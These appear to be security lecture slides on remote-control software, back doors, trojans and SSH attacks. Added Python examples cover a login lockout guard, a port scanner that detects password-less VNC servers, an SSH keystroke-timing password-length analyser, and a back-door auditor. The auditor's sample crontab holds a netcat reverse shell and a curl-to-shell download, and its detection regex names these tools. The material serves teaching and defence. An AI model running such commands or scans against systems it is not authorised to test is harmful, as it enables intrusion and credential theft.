Remote Control and Advanced Techniques
Lesson 17
Remote Control Software
  • With global corporations, support personnel who can deal with computer problems may not always be on-site. They may use remote control software to provide support and maintenance from a central location.
  • The problem is that the same software that serves these useful purposes can be exploited by attackers, especially if it is misconfigured, to gain remote access to and control of computers and networks.
  • Some newer trojans are designed to perform the same sort of functions as legitimate remote control software.
Ports for some Remote Control SW

Software                      TCP                  UDP
Citrix ICA                    1494                 1494
pcAnywhere                    22, 5631, 65301      22, 5632
ReachOut                      43188                None
Remotely Anywhere             2000, 2001           None
Remotely Possible/ControlIT   799, 800             800
Timbuktu                      407                  407
VNC                           5800, 5801, ...      None
                              5900, 5901, ...
Windows Term Server           3389                 None
Radmin                        4899                 None

Discovering RC Software
  • If an attacker finds one of these ports answering, they will try to exploit it.
  • After a default installation, many of these applications accept connections from anywhere, sometimes without requiring a username or password at all.
  • The easiest way to test for them is simply to attempt to connect to one of these ports.
    • Try enumeration techniques to obtain possible user IDs, then guess passwords for those accounts.
Some sensible countermeasures
  • Enable Passwords on your system
    • Too often this is left off, especially for dial-up access, where people think "nobody knows about it, they would have to know the phone number."
  • Enforce Strong passwords
    • If you are going to use passwords, you might as well make them strong.
  • Force Alternate Authentication
    • You do not have to rely on the OS alone; some packages provide additional authentication of their own that can be required.
  • Encrypt Session Traffic
  • Limit Login Attempts
  • Log Failed Attempts
  • Lock Out Failed Users
  • Change the Default Listen Port
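The three attempt-related countermeasures (limit login attempts, log failed attempts, lock out failed users) as one mechanism, written here as an added example; it is not code from the presentation or from any of the products listed. The thresholds (5 failures within 5 minutes, then a 15-minute lockout) and the replayed attempt sequence are assumptions constructed for the example.

```python
from collections import defaultdict, deque
from dataclasses import dataclass, field


@dataclass
class LoginGuard:
    """Limit, log and lock out failed logins per (user, source address) pair.

    Thresholds are assumptions for the example: 5 failures within 5 minutes
    locks the pair out for 15 minutes.
    """
    max_failures: int = 5
    window: float = 300.0
    lockout: float = 900.0
    failures: dict = field(default_factory=lambda: defaultdict(deque))
    locked_until: dict = field(default_factory=dict)
    log: list = field(default_factory=list)   # (time, event, user, source)

    def attempt(self, user, source, password_ok, now):
        """Record one login attempt; return 'ok', 'fail' or 'locked'."""
        key = (user.lower(), source)
        until = self.locked_until.get(key)
        if until is not None and now < until:
            # Still locked: reject without consulting the password, so a
            # correct guess during the lockout tells the attacker nothing.
            self.log.append((now, "locked", user, source))
            return "locked"
        if password_ok:
            self.failures.pop(key, None)   # success clears the failure history
            return "ok"
        hist = self.failures[key]
        hist.append(now)
        while hist and now - hist[0] > self.window:
            hist.popleft()                 # forget failures older than the window
        self.log.append((now, "fail", user, source))
        if len(hist) >= self.max_failures:
            self.locked_until[key] = now + self.lockout
            self.failures.pop(key, None)
            self.log.append((now, "lockout", user, source))
            return "locked"
        return "fail"


# Constructed attempt sequence (seconds, user, source, password correct?):
# a guessing run against "admin" from one address, an unrelated legitimate
# login, and the real admin password once the lockout has expired.
SAMPLE_ATTEMPTS = [
    (0, "admin", "203.0.113.7", False),
    (1, "admin", "203.0.113.7", False),
    (2, "admin", "203.0.113.7", False),
    (3, "admin", "203.0.113.7", False),
    (4, "admin", "203.0.113.7", False),   # 5th failure -> locked until t=904
    (5, "admin", "203.0.113.7", True),    # right password, still rejected
    (10, "alice", "198.51.100.4", True),  # other user/source is unaffected
    (905, "admin", "203.0.113.7", True),  # lockout expired -> accepted
]


def replay(attempts, guard=None):
    """Feed a list of attempts through a LoginGuard and return the decisions."""
    guard = guard if guard is not None else LoginGuard()
    return [guard.attempt(user, src, ok, t) for (t, user, src, ok) in attempts]


if __name__ == "__main__":
    guard = LoginGuard()
    for (t, user, src, ok), verdict in zip(SAMPLE_ATTEMPTS, replay(SAMPLE_ATTEMPTS, guard)):
        print(f"t={t:4d} {user:6s} {src:14s} {'correct' if ok else 'wrong  '} -> {verdict}")
    print("failed/blocked events logged:", len(guard.log))
```

Keying the counter on user plus source address means an attacker cannot lock a legitimate user out just by sending wrong passwords from elsewhere, but it also means a distributed guessing run needs a separate per-user cap; the lockout events in the log are what a monitoring team should alert on.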
Virtual Network Computing
  • Originally developed at AT&T Labs.
  • Can be used with/by Windows, Linux, and Solaris platforms
  • Obtainable from
  • Has some vulnerabilities (big surprise)
    • Brute forcing VNC passwords
      • Weak passwords are a possible problem, as always
    • Network eavesdropping
      • By default, VNC does not encrypt the session at all after a user authenticates to the VNC server, so keystrokes and screen contents cross the network in the clear.
    • Weak WinVNC password obfuscation
      • WinVNC stores the server password in an obfuscated (not securely encrypted) form; anyone who can read the stored value may be able to recover the cleartext server password.
Microsoft Terminal Server
  • Terminal Server lets you deliver Windows-based applications, or the Windows desktop itself, to virtually any computing device—including those that cannot run Windows.
  • When users run an application on Terminal Server, the application execution takes place on the server, and only keyboard, mouse and display information is transmitted over the network. Users see only their own individual sessions, which are managed transparently by the server operating system, and remain independent of any other client session.
  • Windows 2000 Terminal Services remote administration mode is called "Remote Desktop for Administration" in Windows Server 2003, and has the ability to remote the actual console session of the server.
Terminal Server Attacks
  • Locating a Terminal Server is easy: it listens on TCP port 3389.
    • Launch your own Terminal Server client, wait to be prompted for a login ID and password, then make the normal password-guessing attempts at that point.
  • ProbeTS and TSEnum are tools that cycle through an identified subnet attempting to locate Terminal Servers.
  • Some other attacks are possible as well
    • RegAPI.DLL buffer overflow
    • Weak encryption that can lead to eavesdropping
    • Some possible user privilege escalation attacks
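An added example for both the Discovering RC Software slide and the Terminal Server location step above; it is not code from the presentation, from ProbeTS or TSEnum, or from any product in the port table. It walks the table's default ports, records whatever the service says first, and recognizes two services by protocol rather than by port: a VNC server announces its RFB version before any authentication, and if the probe agrees to that version it can read the security types on offer and report a server that accepts connections with no password at all; a Terminal Server answers an X.224 Connection Request on 3389 with a Connection Confirm, which is what a ProbeTS/TSEnum-style sweep relies on. The product names attached to bare ports are only the table's guesses, and the target address and timeout are assumptions. Run it only against hosts you are authorized to test.

```python
import socket

# Default TCP ports from the slide's table, used as the fallback label when a
# service gives no recognizable banner. Assumption: only the TCP column.
RC_PORTS = {
    1494: "Citrix ICA",
    22: "pcAnywhere (or SSH)", 5631: "pcAnywhere", 65301: "pcAnywhere",
    43188: "ReachOut",
    2000: "Remotely Anywhere", 2001: "Remotely Anywhere",
    799: "Remotely Possible/ControlIT", 800: "Remotely Possible/ControlIT",
    407: "Timbuktu",
    5800: "VNC (HTTP viewer)", 5801: "VNC (HTTP viewer)", 5900: "VNC", 5901: "VNC",
    3389: "Windows Terminal Server",
    4899: "Radmin",
}

# Minimal X.224 Connection Request in a TPKT header: the first thing an RDP
# client sends. A Terminal Server replies with an X.224 Connection Confirm (0xD0).
RDP_CONNECT_REQ = bytes.fromhex("0300000b06e00000000000")

# RFB security types a server may offer after the version handshake.
SEC_NAMES = {0: "connection failed", 1: "None (no password)", 2: "VNC Authentication"}


def vnc_security_types(banner, reply):
    """Security types offered by a VNC server once the client has agreed a version.

    RFB 3.3 servers send one big-endian U32 type; 3.7 and later send a U8
    count followed by that many U8 types.
    """
    try:
        minor = int(banner[8:11])
    except ValueError:
        return []
    if minor < 7:
        return [int.from_bytes(reply[:4], "big")] if len(reply) >= 4 else []
    if not reply:
        return []
    return list(reply[1:1 + reply[0]])


def identify(port, data, extra=b""):
    """Name the service from its first bytes; fall back to the port table.

    `data` is what the server sent first (VNC speaks first) or sent in reply to
    our probe (RDP); `extra` is the VNC security-type message, if collected.
    Returns (product, evidence).
    """
    if data.startswith(b"RFB "):
        banner = data.split(b"\n", 1)[0]
        names = ", ".join(SEC_NAMES.get(t, f"type {t}") for t in vnc_security_types(banner, extra))
        detail = banner.decode("ascii", "replace") + (f"; security: {names}" if names else "")
        return ("VNC", detail)
    if len(data) >= 7 and data[0] == 0x03 and data[5] == 0xD0:
        return ("Windows Terminal Server/RDP", "X.224 Connection Confirm")
    if port in RC_PORTS:
        return (RC_PORTS[port], "port table only; no banner")
    return ("unknown", "open, no banner")


def _recv(sock):
    try:
        return sock.recv(64)
    except socket.timeout:
        return b""


def probe(host, port, timeout=3.0):
    """Connect to one port; return identify()'s verdict, or None if it is closed."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            if port == 3389:
                s.sendall(RDP_CONNECT_REQ)
            data, extra = _recv(s), b""
            if data.startswith(b"RFB "):
                # Agree to the server's version; it then lists its security
                # types. No credential is sent, so this is a safe stopping point.
                s.sendall(data.split(b"\n", 1)[0] + b"\n")
                extra = _recv(s)
    except OSError:   # refused, unreachable, or timed out on connect
        return None
    return identify(port, data, extra)


def scan(host, ports=tuple(sorted(RC_PORTS))):
    """Return {port: (product, evidence)} for ports that accepted a connection."""
    results = {}
    for port in ports:
        verdict = probe(host, port)
        if verdict is not None:
            results[port] = verdict
    return results


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"   # assumed target
    for port, (product, evidence) in scan(target).items():
        print(f"{target}:{port}\t{product}\t({evidence})")
```

A VNC server whose evidence reads "security: None (no password)" is exactly the open-by-default installation the discovery slide describes; a port that answers with nothing is still worth a manual connection with the real client, since several of the listed products wait for the client to speak first.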
Session Hijacking
  • An attempt to "take over" an established session.
  • Some tools that can aid in this endeavor:
    • Hunt: first lets you snoop on a connection, then insert your own commands into the stream
  • Best countermeasure: encryption. If a person cannot view the traffic of the session, it is hard to insert commands that the other end will accept.
Back Doors
  • If an intruder gets into your system, count on them attempting to install back doors that allow continued access even after you find and eliminate their primary way in.
    • Finding and clearing these can be a laborious task
  • Some common back doors:
    • Rogue user accounts
    • Startup files: even if you clean up, these can reinstall ways in
    • Scheduled jobs: similar to startup files, these execute in the future and reinstall ways in
    • Remote control program installation
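An added example of the laborious part: auditing a Unix host for the first three back doors in the list (rogue accounts, startup files, scheduled jobs). It is not code from the presentation. The sample passwd, crontab and rc.local contents are constructed for the example, and the pattern list is a heuristic assumed here rather than any product's rule set.

```python
import re

# Patterns typical of planted jobs: programs run out of world-writable
# scratch directories, a listening or connect-back netcat, or a download piped
# straight into a shell. Heuristic, assumed for this example; tune per host.
SUSPICIOUS = re.compile(
    r"/tmp/|/dev/shm/|/var/tmp/"           # executing from scratch space
    r"|\b(nc|ncat|netcat|socat)\b"         # connect-back / listener tools
    r"|(curl|wget)[^|]*\|\s*(ba)?sh\b"     # fetch-and-run
    r"|/dev/tcp/"                          # bash network redirection
)


def rogue_uid0_accounts(passwd_text):
    """Names of accounts other than root whose UID is 0 (a rogue super-user)."""
    rogue = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if line.startswith("#") or len(fields) < 7:
            continue
        name, uid = fields[0], fields[2]
        if uid == "0" and name != "root":
            rogue.append(name)
    return rogue


def suspicious_lines(text):
    """Non-comment lines of a crontab or startup script that match SUSPICIOUS."""
    hits = []
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        if "=" in s.split()[0]:
            continue                       # crontab environment lines (SHELL=...)
        if SUSPICIOUS.search(s):
            hits.append(s)
    return hits


def audit(passwd_text, crontab_text, startup_text):
    """Run all three checks and return the findings grouped by back door type."""
    return {
        "rogue_accounts": rogue_uid0_accounts(passwd_text),
        "scheduled_jobs": suspicious_lines(crontab_text),
        "startup_files": suspicious_lines(startup_text),
    }


# Constructed sample inputs (not taken from a real host).
PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
toor:x:0:0::/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
"""
CRONTAB = """# /etc/crontab
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/10 * * * * root /tmp/.x/nc -e /bin/sh 203.0.113.7 4444
@reboot root curl -s http://203.0.113.7/a | sh
"""
RC_LOCAL = """#!/bin/sh -e
/usr/sbin/ntpd
sh -c 'exec /dev/shm/.s' &
exit 0
"""

if __name__ == "__main__":
    import pathlib

    def read(path, default):
        # On a live host read the real file; fall back to the sample if absent.
        p = pathlib.Path(path)
        return p.read_text() if p.exists() else default

    report = audit(read("/etc/passwd", PASSWD), read("/etc/crontab", CRONTAB),
                   read("/etc/rc.local", RC_LOCAL))
    for section, items in report.items():
        print(section)
        for item in items:
            print("   ", item)
```

The checks are deliberately cheap to run repeatedly: a back door that survives one cleanup, as the slide warns, is usually reinstalled by the very startup file or scheduled job that was missed the first time, so the audit should be rerun after every cleanup until it comes back empty. Per-user crontabs, systemd units and shell profile files are further places to apply the same line filter.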
Back Orifice and Netbus
  • Both are very similar to some of the RC software packages (and are sometimes advertised in that fashion).
  • The original BO ran on Win 9x; BO2K added NT/2000.
  • NetBus, similar to BO, consists of two parts: a client program ("netbus.exe") and a server program, often named "patch.exe" (or "SysEdit.exe" with version 1.5x), which is the actual back door. Version 1.60 uses TCP/UDP port 12345, which cannot be altered. From version 1.70 on, the port can be configured.
  • BO2K also added some stealth capabilities and the ability to customize it, making it harder to detect.
Remote Control Backdoor Port Numbers

Backdoor             Default TCP     Default UDP     Altern. Ports
Remote.exe           135-139         135-139         No
Netcat               Any             Any             Yes
Back Orifice         NA              31337           Yes
Back Orifice 2000    54320           54321           Yes
NetBus               12345           NA              Yes
Masters Paradise     40421, 40426    NA              Yes

  • “A Trojan horse is a program that purports to be a useful software tool, but it actually performs unintended (and often unauthorized) actions, or installs malicious or damaging software behind the scenes when launched.”
  • The key point about Trojans is that somebody on the system has to run the Trojan in order for it to do its nefarious task.
  • Two implications for us
    • When doing an assessment, does the organization we are working with have Trojans installed? Is the environment such that it is likely they could be?
    • Can we use a Trojan to further our testing goals?
Whack-a-Mole
  • An example of a program that installed the NetBus server while letting you play a game.
  • Figure pg. 581 McClure et al.
Secure Shell (SSH) Attacks
  • SSH is a secure protocol used in place of programs such as telnet to conduct protected remote interactive sessions.
  • Pretty good tool, but it is vulnerable to a couple of things:
    • Traffic analysis. A program exists that lets you determine the length of a password or command sent, because an interactive session sends one small packet per keystroke and the encryption hides the content but not the packet count or timing.
    • Man-in-the-middle attack. Requires that you be able to substitute your own key for the host's public key the client expects (or that the client never checks it), and that you control DNS so the client connects to you instead of the real host.
  • Once a system has been subverted, a rootkit is often one of the first things downloaded and installed.
  • It will generally include
    • Trojanized versions of common programs
    • Back doors (as discussed previously)
    • Sniffers
    • System log cleaners
  • Imaging the system (creating a mirror image of the system volumes) is also sometimes done once access is obtained.
    • Useful in circumventing security tools that rely on a recorded system state or details such as checksums.
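The SSH traffic-analysis attack mentioned above, as an added example; this is not code from the presentation or from the program it refers to. The idea is that everything typed at a remote shell is echoed back by the server, except input at a no-echo prompt such as the password asked for by su: a run of keystroke packets with no server packet in between is therefore a password, its length is the password length, and the gaps between the packets are the victim's typing rhythm. The packet trace is constructed for the example (times, directions and sizes are assumed), and the keystroke size cutoff is an assumption.

```python
# Packets are (time_in_seconds, direction, payload_bytes); direction is "c2s"
# (client to server) or "s2c". Constructed trace, not a capture: the user types
# "ls" Enter, then "su" Enter, then a 7-character password that the remote
# side does not echo, then Enter. Interactive SSH sends each keystroke as its
# own small packet and the remote shell echoes it straight back.
TRACE = [
    (0.00, "c2s", 20), (0.01, "s2c", 20),   # 'l' and its echo
    (0.20, "c2s", 20), (0.21, "s2c", 20),   # 's'
    (0.40, "c2s", 20), (0.42, "s2c", 84),   # Enter, directory listing comes back
    (2.00, "c2s", 20), (2.01, "s2c", 20),   # 's'
    (2.20, "c2s", 20), (2.21, "s2c", 20),   # 'u'
    (2.40, "c2s", 20), (2.41, "s2c", 28),   # Enter, "Password:" prompt
    (3.50, "c2s", 20), (3.70, "c2s", 20), (3.85, "c2s", 20), (4.10, "c2s", 20),
    (4.30, "c2s", 20), (4.45, "c2s", 20), (4.70, "c2s", 20),   # 7 chars, no echo
    (5.00, "c2s", 20), (5.30, "s2c", 36),   # Enter, root prompt after a PAM delay
]


def keystrokes(packets, max_len=48):
    """Times of client packets small enough to carry a single keystroke."""
    return [t for (t, d, n) in packets if d == "c2s" and n <= max_len]


def unechoed_runs(packets, min_len=3, max_len=48):
    """Runs of keystrokes that drew no server packet before the next keystroke.

    A keystroke with nothing from the server between it and the next keystroke
    was typed at a no-echo prompt (su, sudo, passwd). The run length is the
    password length; the gaps are its typing rhythm. The Enter that ends the
    password does get a response (the prompt), so it closes the run without
    being counted. Returns [(start_time, length, inter_keystroke_gaps)].
    """
    server_times = sorted(t for (t, d, n) in packets if d == "s2c")
    keys = keystrokes(packets, max_len)
    runs, current = [], []

    def close_run():
        if len(current) >= min_len:
            gaps = [round(b - a, 2) for a, b in zip(current, current[1:])]
            runs.append((current[0], len(current), gaps))

    for i, t in enumerate(keys):
        nxt = keys[i + 1] if i + 1 < len(keys) else float("inf")
        echoed = any(t < st < nxt for st in server_times)
        if echoed:
            close_run()
            current = []
        else:
            current.append(t)
    close_run()
    return runs


def password_length(packets):
    """Length of the first password typed in the trace, or None if none is found."""
    runs = unechoed_runs(packets)
    return runs[0][1] if runs else None


if __name__ == "__main__":
    for start, length, gaps in unechoed_runs(TRACE):
        print(f"no-echo input at t={start}: {length} keystrokes, gaps {gaps}")
```

The analysis needs only packet sizes and timestamps, which is why encrypting the session does not stop it; a typist fast enough that the echo of one key arrives after the next key is pressed will confuse the echo test, so real tools also use the sizes. Recent OpenSSH releases (9.5 and later) send fake keystroke packets and regularize their timing in interactive sessions precisely to blunt this kind of measurement.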
Social Engineering
  • “Clueless User” vs. the Help Desk
  • “Help Desk” vs. the Clueless User
  • Countermeasures
    • Limit data leakage through web sites, public databases, …
    • Formulate a strict policy for internal and external technical support procedures
    • Be paranoid about remote access
    • Craft outbound firewall and router access controls just as carefully as inbound
    • Use email safely
    • Educate employees on the basics of a secure environment (and on social engineering)
  • What is the importance and significance of this material?
    • Remote Control software is more prevalent and is a tremendous security concern.
  • How does this topic fit into the subject of “Security Risk Analysis”?
    • We need to know about the different packages that could be installed and that the organization we are testing might not know about.
Report from Teams
  • Another possible assessment.
  • So, how’d it go?